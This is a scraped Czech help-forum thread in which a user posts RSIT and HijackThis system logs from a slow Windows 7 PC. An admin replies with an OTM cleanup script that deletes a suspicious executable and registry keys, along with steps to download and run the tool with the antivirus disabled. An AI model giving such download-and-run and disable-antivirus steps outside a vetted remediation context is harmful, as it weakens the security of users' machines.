[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
C:\Program Files (x86)\Mozilla Firefox\plugins\
nppdf32.dll
C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283\extensions\
cs@dictionaries.addons.mozilla.org
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\ssv.dll [2018-04-25 582088]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-05-24 958328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\jp2ssv.dll [2018-04-25 245192]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7b523e7c-f096-4e36-a0cb-7efeb5c675c1}]
IEExtension.VDownloaderBHO - C:\Windows\system32\mscoree.dll [2010-11-21 444752]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-05-24 820672]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-05-24 242904]
[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"=C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [2013-10-08 766208]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2018-03-28 588704]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\prwntdrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\prwntdrv]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"SoftwareSASGeneration"=1
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoSimpleNetIDList"=1
"NoDriveTypeAutoRun"=221
"NoDrives"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"vidc.mjpg"=bdmjpeg64.dll
"vidc.mpeg"=bdmpegv64.dll
"msacm.bdmpeg"=bdmpega64.acm
"VIDC.FPS1"=frapsv64.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
======List of files/folders created in the last 1 month======
2018-09-04 20:51:41 ----A---- C:\Windows\ntbtlog.txt
2018-09-04 20:33:45 ----D---- C:\AdwCleaner
2018-09-04 17:05:14 ----D---- C:\rsit
2018-09-03 14:19:18 ----D---- C:\Windows\{EB47D3E9-14CE-4BE0-B16B-C061571F46C7}
2018-09-02 16:15:31 ----D---- C:\9df5ec6646e5f65a782b5ad04331
2018-09-02 11:10:32 ----D---- C:\Windows\{D32F0790-E651-41F4-9571-6065DA044B85}
2018-09-01 20:53:51 ----D---- C:\Program Files\VS Revo Group
2018-09-01 20:28:40 ----N---- C:\Windows\SYSWOW64\mfc71.dll
2018-08-29 15:10:58 ----D---- C:\Windows\{B58AFBDA-7D5B-40C0-BE79-D9F3286E2165}
2018-08-25 09:52:05 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-22 18:51:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-14 21:52:56 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-10 14:47:32 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-07 13:48:33 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
======List of files/folders modified in the last 1 month======
2018-09-05 16:07:19 ----D---- C:\Program Files\trend micro
2018-09-05 16:07:11 ----D---- C:\Windows\Temp
2018-09-05 15:55:06 ----D---- C:\Windows\SysWOW64
2018-09-05 15:53:13 ----SHD---- C:\Windows\Installer
2018-09-05 15:52:57 ----SHD---- C:\Config.Msi
2018-09-04 20:51:41 ----D---- C:\Windows
2018-09-04 16:26:00 ----D---- C:\Users\Drone\AppData\Roaming\MPC-HC
2018-09-04 14:00:23 ----D---- C:\Windows\system32\LogFiles
2018-09-04 13:57:19 ----D---- C:\Windows\Prefetch
2018-09-03 22:07:02 ----D---- C:\Users\Drone\AppData\Roaming\PhotoScape
2018-09-03 20:28:28 ----D---- C:\Windows\rescache
2018-09-03 17:08:24 ----D---- C:\Windows\SYSWOW64\Macromed
2018-09-02 20:42:57 ----D---- C:\Windows\inf
2018-09-02 20:42:54 ----D---- C:\Windows\Minidump
2018-09-02 19:39:45 ----D---- C:\Windows\system32\config
2018-09-02 19:38:34 ----D---- C:\Windows\winsxs
2018-09-02 19:32:55 ----D---- C:\Windows\system32\catroot2
2018-09-02 19:09:26 ----D---- C:\Windows\System32
2018-09-02 19:09:26 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-09-02 19:01:32 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-09-02 19:01:32 ----D---- C:\Program Files\Internet Explorer
2018-09-02 19:01:31 ----D---- C:\Windows\SYSWOW64\en-US
2018-09-02 19:01:30 ----D---- C:\Windows\system32\drivers
2018-09-02 19:01:30 ----D---- C:\Windows\system32\cs-CZ
2018-09-02 19:01:29 ----D---- C:\Windows\system32\en-US
2018-09-02 19:01:27 ----D---- C:\Windows\AppPatch
2018-09-02 19:01:27 ----D---- C:\Program Files (x86)\Internet Explorer
2018-09-02 19:01:26 ----D---- C:\Windows\system32\Boot
2018-09-02 19:01:22 ----D---- C:\Windows\system32\DriverStore
2018-09-02 18:25:57 ----D---- C:\Windows\system32\CodeIntegrity
2018-09-01 21:44:27 ----RD---- C:\Program Files (x86)
2018-09-01 21:02:13 ----D---- C:\Users\Drone\AppData\Roaming\uTorrent
2018-09-01 21:02:12 ----D---- C:\Users\Drone\AppData\Roaming\Seznam.cz
2018-09-01 20:53:51 ----D---- C:\Program Files
2018-08-28 15:08:59 ----SD---- C:\ProgramData\Microsoft
2018-08-26 15:08:15 ----D---- C:\Users\Drone\AppData\Roaming\vlc
2018-08-23 14:22:53 ----D---- C:\Windows\system32\Tasks
2018-08-14 21:51:03 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2018-08-14 21:50:54 ----D---- C:\Windows\system32\Macromed
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Firefox
2018-08-11 14:57:07 ----D---- C:\Program Files (x86)\Common Files
2018-08-10 21:58:02 ----RSD---- C:\Windows\assembly
2018-08-06 22:57:04 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-05-24 199440]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-05-24 343752]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-05-24 57680]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-05-24 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-05-24 381552]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2018-01-01 213736]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-05-24 196640]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-05-24 227504]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-05-24 234560]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-05-24 111360]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-05-24 1027720]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-05-24 460520]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2012-01-12 514560]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-05-24 159120]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-05-24 205976]
R2 npf;NetGroup Packet Filter Driver; C:\Windows\system32\drivers\npf.sys [2011-02-11 35344]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-10-08 12534784]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-10-08 619008]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2016-04-01 104976]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2009-03-01 187392]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-05-24 46968]
S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2012-01-12 95232]
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 prwntdrv;prwntdrv; \??\C:\Windows\syswow64\prwntdrv.sys [2014-10-23 15456]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2012-01-12 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2018-03-21 83984]
R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-10-08 239616]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-05-24 317280]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-05-24 7620096]
S2 avast;Služba %1!s! Update (avast); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2017-04-21 107656]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2017-04-21 128648]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-08-14 335872]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2012-01-12 27648]
S3 avastm;Služba %1!s! Update (avastm); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2015-02-13 136120]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2017-12-29 116224]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2018-08-11 194512]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-30 1255736]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2017-04-21 52856]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
-----------------EOF-----------------
-
Rudy
- Site Admin
- Příspěvky: 118251
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Zpomalené PC
Stačilo to jednou. 
Stáhněte OTM: http://oldtimer.geekstogo.com/OTM.exe a uložte na plochu. Spusťte a do levého okna zkopírujte:
Stáhněte OTM: http://oldtimer.geekstogo.com/OTM.exe a uložte na plochu. Spusťte a do levého okna zkopírujte:a klikněte na >MoveIt!<. Před skenem vypněte antivir a po něm restartujte PC. Dejte nový log RSIT.:files
C:\Windows\SysWOW64\EhYeIeLWi.exe
:reg
[-HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7b523e7c-f096-4e36-a0cb-7efeb5c675c1}]/64
[-HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7b523e7c-f096-4e36-a0cb-7efeb5c675c1}]/64
[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"=-
:commands
[Purity]
[Emptytemp]
[Emptyflash]
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Zpomalené PC
RSIT log:
Logfile of random's system information tool 1.10 (written by random/random)
Run by Drone at 2018-09-05 18:49:51
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 47 GB (20%) free of 238 GB
Total RAM: 4094 MB (70% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 18:50:05, on 5.9.2018
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18894)
Boot mode: Normal
Running processes:
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files\trend micro\Drone.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkI ... id=UE12DHP
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Služba %1!s! Update (avast) (avast) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Služba %1!s! Update (avastm) (avastm) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 5495 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
atieclxx
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\System32\spoolsv.exe
"taskhost.exe"
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
taskeng.exe {E394D705-711F-45EE-B5D9-8E4C8B8379D5}
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe"
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler64.exe"
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\SearchIndexer.exe /Embedding
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
AvastUI.exe /nogui
"C:\Program Files\AVAST Software\Avast\setup\instup.exe" /instop:update_vps
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\sppsvc.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 512 516 524 65536 520
"C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe"
"C:\Users\Drone\Desktop\RSITx64 (1).exe"
=========Mozilla firefox=========
ProfilePath - C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283
prefs.js - "browser.search.useDBForOrder" - true
"support@vdownloader.com"=C:\Program Files\VDownloader\Addons\FireFox
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]
"Description"=Picasa3 plugin
